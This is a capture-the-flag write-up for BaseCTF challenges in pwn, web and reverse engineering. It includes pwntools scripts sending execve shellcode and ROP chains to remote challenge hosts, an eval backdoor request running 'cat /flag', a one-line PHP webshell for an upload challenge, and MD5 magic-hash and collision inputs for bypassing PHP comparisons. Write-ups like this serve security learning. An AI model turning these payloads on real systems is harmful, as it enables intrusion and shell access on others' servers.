buf = mmap(0LL, 0x1000uLL, 7, 34, -1, 0LL);

from pwn import *

p = remote('challenge.basectf.fun', 40496)

# 22-byte execve("/bin//sh", NULL, NULL) for x86-64:
#   xor rsi, rsi ; push rsi ; movabs rdi, "/bin//sh" ; push rdi ; push rsp ; pop rdi
#   mov al, 0x3b ; cdq ; syscall
# (mov al relies on the upper bits of rax already being zero, which holds right after read() returns a small count)
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"

p.sendlineafter(b"please input shellcode:", shellcode)
p.interactive()

# BaseCTF{9b3c2e70-5f43-4556-9172-da7ca95f43b4}

Ret2text

checksec shows only NX enabled:

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

There is a backdoor function (bin_sh_add below), so ret2text:

from pwn import *

io = remote("challenge.basectf.fun", 28971)

bin_sh_add = 0x4011BB          # address used: returns past the backdoor's push, no alignment gadget needed
# bin_sh_add = 0x4011A4        # start of the backdoor; returning here needs the ret gadget below
# ret_add = 0x40101a           # lone `ret` gadget: re-aligns the stack to 16 bytes

payload = b'a' * (0x20 + 8) + p64(bin_sh_add)   # 0x20-byte buffer + saved rbp, then the return address
# payload = b'a' * (0x20 + 8) + p64(ret_add) + p64(bin_sh_add)

io.sendline(payload)

io.interactive()

Note that if the address you return to lies before the function's push (so its prologue still runs), the stack must be re-aligned to 16 bytes first, which the commented-out variant does by returning through a lone ret gadget before the backdoor; glibc's system() crashes on a misaligned stack instead of spawning a shell.


我把她丢了

checksec shows only NX enabled:

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The strings include "/bin/sh" and the binary calls system, so a short ROP chain that calls system("/bin/sh") will do. Strictly this is ret2text with a small ROP chain rather than a ret2syscall, since we reuse the program's own call to system and need no syscall gadget.

First find the address of the call _system instruction and of the "/bin/sh" string. On x86-64 the first integer arguments are passed in rdi, rsi, rdx, rcx, r8, r9 in that order, so we also need a pop rdi ; ret gadget to load the string's address into rdi:

ROPgadget --binary 1 --only "pop|ret" |grep rdi
0x0000000000401196 : pop rdi ; ret

from pwn import *

io = remote("challenge.basectf.fun", 23092)

sys_add = 0x40120F        # the program's own `call _system`
bin_sh_add = 0x402008     # "/bin/sh"
pop_rdi_ret = 0x401196    # pop rdi ; ret

# 0x70-byte buffer + saved rbp, then: pop rdi <- "/bin/sh", return into call _system
payload = b'a' * (0x70 + 8) + p64(pop_rdi_ret) + p64(bin_sh_add) + p64(sys_add)

io.sendlineafter(b"Help me find her.", payload)

io.interactive()

# BaseCTF{b27be698-3f93-412a-8a24-fcec5b7974ad}
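The alignment remark in Ret2text and the chain in 我把她丢了 follow one rule: the SysV ABI has rsp % 16 == 8 at function entry, and glibc's system() relies on it, so what matters is how many 8-byte pops and pushes happen between the overflowed ret and system's entry. The block below is an added example, not the writeup's exploit code: it builds the same payloads without pwntools and tracks rsp through the three chains used above. The addresses are the ones quoted in the two writeups; that 0x4011BB lies after the backdoor's push rbp and 0x4011A4 at its start is inferred from the writeup's note, and the 8 mod 16 value of rsp at the overflowed ret is an assumption about the frame (true after a normal leave / pop rbp).

```python
import struct

# Addresses quoted from the two writeups above (Ret2text and 我把她丢了).
BACKDOOR_AFTER_PUSH = 0x4011BB   # Ret2text: used without an alignment gadget
BACKDOOR_START = 0x4011A4        # Ret2text: function start, needs the ret gadget first
RET_GADGET = 0x40101a            # lone `ret`
POP_RDI_RET = 0x401196           # pop rdi ; ret
CALL_SYSTEM = 0x40120F           # the program's own `call _system`
BIN_SH = 0x402008                # "/bin/sh"


def build_payload(pad_len, *chain):
    """Padding up to the saved return address, then the chain as little-endian 64-bit words
    (what pwntools' p64 produces)."""
    return b'a' * pad_len + b''.join(struct.pack('<Q', word) for word in chain)


def rsp_at_system_entry(gadget_pops, prologue_runs, rsp_at_ret=0x7ffc0000_0008):
    """Track rsp from the overflowed function's `ret` to the moment system() is entered.

    gadget_pops: one entry per gadget returned through, giving how many qwords its pops
    consume (0 for a lone `ret`, 1 for `pop rdi ; ret`); each gadget's own `ret` takes one more.
    prologue_runs: True when the final target still executes `push rbp` before `call system`,
    False when we land after the push or directly on the call instruction.
    rsp_at_ret points at the overwritten return address; 8 mod 16 is assumed (see lead-in)."""
    rsp = rsp_at_ret + 8                   # the function's `ret` pops our first chain word
    for pops in gadget_pops:
        rsp += 8 * (pops + 1)              # operands popped, then the gadget's `ret` pops the next word
    if prologue_runs:
        rsp -= 8                           # `push rbp`
    rsp -= 8                               # `call system` pushes the return address
    return rsp


def system_will_run(gadget_pops, prologue_runs):
    """rsp % 16 == 8 at entry is what the ABI promises and what system() (movaps on a 16-aligned
    slot) needs; the other parity crashes instead of spawning a shell."""
    return rsp_at_system_entry(gadget_pops, prologue_runs) % 16 == 8


# The chains from the writeups expressed in the model.
RET2TEXT_DIRECT = ([], True)        # 0x4011A4 with no ret gadget: misaligned
RET2TEXT_ALIGNED = ([0], True)      # ret gadget, then 0x4011A4: aligned
RET2TEXT_AFTER_PUSH = ([], False)   # 0x4011BB: aligned because the push is skipped
LOST_HER = ([1], False)             # pop rdi ; ret, then the call: aligned

if __name__ == '__main__':
    for name, (pops, prologue) in [('direct', RET2TEXT_DIRECT), ('aligned', RET2TEXT_ALIGNED),
                                   ('after push', RET2TEXT_AFTER_PUSH), ('lost her', LOST_HER)]:
        print(name, system_will_run(pops, prologue))
    print(build_payload(0x70 + 8, POP_RDI_RET, BIN_SH, CALL_SYSTEM).hex())
```

The pop rdi ; ret gadget consumes two qwords, which is why the chain in 我把她丢了 lands on the call with the right parity and needs no extra ret; adding one there would break it.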

Web

What is HTTP? (HTTP 是什么呀)

After supplying the parameters the challenge asks for, the flag shows up in the request:

GET /success.php?flag=QmFzZUNURnszZDE0YTBlNi01ZDMxLTQ2MTctYmE0Mi0yYWIwOGE5NmIwMDJ9Cg== HTTP/1.1

Base64-decoding it gives the flag:

BaseCTF{3d14a0e6-5d31-4617-ba42-2ab08a96b002}

Meow meow meow ´•ﻌ•` (喵喵喵´•ﻌ•`)

The page has a backdoor parameter whose value is passed to eval, so it gives command execution directly:

http://challenge.basectf.fun:20896/?DT=system(%27cat%20/flag%27);

This prints the flag:

BaseCTF{080a5a58-2bb5-4803-8029-dc9d8868441d}

md5 bypass (md5绕过欸)

The first layer is the 0e bypass. When PHP compares two strings with == and both are numeric strings, it compares them as numbers; a digest of the form 0e followed only by digits is scientific notation for 0 times a power of ten, i.e. 0. So two different inputs whose MD5 digests both look like 0e<digits> compare equal even though the digests differ. A digest such as 0e12a... with a letter after the 0e is not numeric and does not work.

if ($name != $password && md5($name) == md5($password)){

Well-known inputs whose MD5 digest starts with 0e and continues with digits only; any two distinct ones pass this check:

s878926199a
s155964671a
s214587387a
s1091221200a
s1885207154a
s1502113478a
s1836677006a
s1184209335a
s1665632922a
s532378020a
240610708
314282422
571579406
903251147
1110242161
1320830526
1586264293
2302756269
2427435592
2653531602
3293867441
3295421201
3465814713
3524854780
3908336290
4011627063
4775635065
4790555361
5432453531
5579679820
5585393579
6376552501
7124129977
7197546197
7656486157
QLTHNDT
QNKCDZO
EEIZDOI
TUFEPMC
UTIPEZQ
UYXFLOI
IHKFRNS
PJNPDWY
ABJIHVY
DQWRASX
DYAXWCA
GEGHBXL
GGHMVOE
GZECLQZ
NWWKITQ
NOOPCJF
MAUXXQC
MMHUWUV

The second layer uses strict comparison, so numeric-looking digests no longer help: the two MD5 digests must be byte-for-byte identical while the inputs differ, which requires a genuine MD5 collision.

if ($name2 !== $password2 && md5($name2) === md5($password2))

Two well-known pairs of different inputs with identical MD5 digests, URL-encoded so the raw bytes survive the query string (each pair differs in only a few bytes; md5() runs over the decoded bytes):

$Param1=
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

$Param2=
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
$data1=
%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%07%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%f1%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%72%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%34%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%28%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%ab%6f%f7%2a%70

$data2=
%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%87%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%71%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%f2%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%b4%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%a8%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%2b%6f%f7%2a%70

Construct the request: name and password take two of the 0e strings, name2 and password2 take a colliding pair.

http://challenge.basectf.fun:40369/?name=s878926199a&&name2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

password=s155964671a&&password2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

This gives the flag:

BaseCTF{12962a75-f710-4766-8c9a-b0675563f413}
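The two layers fail for different reasons, and it is worth having both checks in code before sending anything: the loose layer depends on PHP's numeric-string rule, the strict layer on a real collision. The block below is an added example, not the challenge's PHP or the writeup's payload: it models PHP's == on strings, tests inputs for 0e-style digests, re-checks both conditions locally, and decodes the first colliding pair quoted above to confirm the digests match while the bytes differ. The numeric-string regex is a simplification of PHP's grammar (assumption), sufficient for hex digests.

```python
import hashlib
import re
from urllib.parse import unquote_to_bytes

# PHP's numeric-string shape: optional whitespace and sign, decimal digits, optional exponent.
_NUMERIC = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$')


def php_loose_equal(a, b):
    """Model PHP's == on two strings: two numeric strings compare as numbers (true in PHP 5,
    7 and 8 alike); anything else compares byte for byte."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def md5_hex(s):
    return hashlib.md5(s if isinstance(s, bytes) else s.encode()).hexdigest()


def is_magic_md5(s):
    """'0e' followed by digits only: PHP reads the digest as 0 * 10^N = 0. A digest such as
    0e12a... (any letter after the 0e) is not numeric and does not collapse to zero."""
    return re.fullmatch(r'0e\d+', md5_hex(s)) is not None


def layer1_passes(name, password):
    """if ($name != $password && md5($name) == md5($password))"""
    return name != password and php_loose_equal(md5_hex(name), md5_hex(password))


def layer2_passes(name2, password2):
    """if ($name2 !== $password2 && md5($name2) === md5($password2)): strict, so only a
    genuine collision (identical digests from different bytes) can satisfy it."""
    return name2 != password2 and md5_hex(name2) == md5_hex(password2)


# The first colliding pair quoted above, decoded from its URL-encoded form.
PARAM1 = unquote_to_bytes('%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2')
PARAM2 = unquote_to_bytes('%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2')


def differing_positions(a, b):
    """Byte offsets at which two equal-length inputs differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


if __name__ == '__main__':
    print(md5_hex('s878926199a'), md5_hex('QNKCDZO'), layer1_passes('s878926199a', 'QNKCDZO'))
    print(md5_hex(PARAM1), md5_hex(PARAM2), layer2_passes(PARAM1, PARAM2), differing_positions(PARAM1, PARAM2))
```

The collision bytes must reach md5() unchanged: any server-side transformation of the parameter (addslashes, trimming, a charset conversion) breaks the pair, which is why they are sent URL-encoded as raw bytes.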

A Dark Room

The flag is in the page source.

upload

Upload a one-line PHP webshell:

<?php 
@eval($_POST['a']); 
?>

Connect to it with AntSword (蚁剑) and read the flag:

BaseCTF{1496a3e2-dce7-4195-8c7b-2659a848f5ad}

Reverse

You are good at IDA

Open the binary in IDA and list the strings (Shift+F12); hint1 reads:

This is the first part.You can shift f12 look look

Jump to the function that references it; it holds flag part 1:

Y0u_4Re_

hint2 reads:

This is the second part.

In its function the part is stored as ASCII codes; decoding them gives flag part 2:

900d_47_

hint3 reads:

Only the last part remains.The last part is in a named Interesting's func

The Interesting function holds the last part, again as ASCII codes:

id4

Concatenating the three parts gives the flag:

BaseCTF{Y0u_4Re_900d_47_id4}

UPX mini

Checking the packer shows a UPX1 section, so the binary is UPX-packed; unpack it with upx -d.

The unpacked binary contains the following Base64 string; decoding it gives the flag:

QmFzZUNURntIYXYzX0BfZzBvZF90MW0zISEhfQ==
BaseCTF{Hav3_@_g0od_t1m3!!!}

Ez Xor
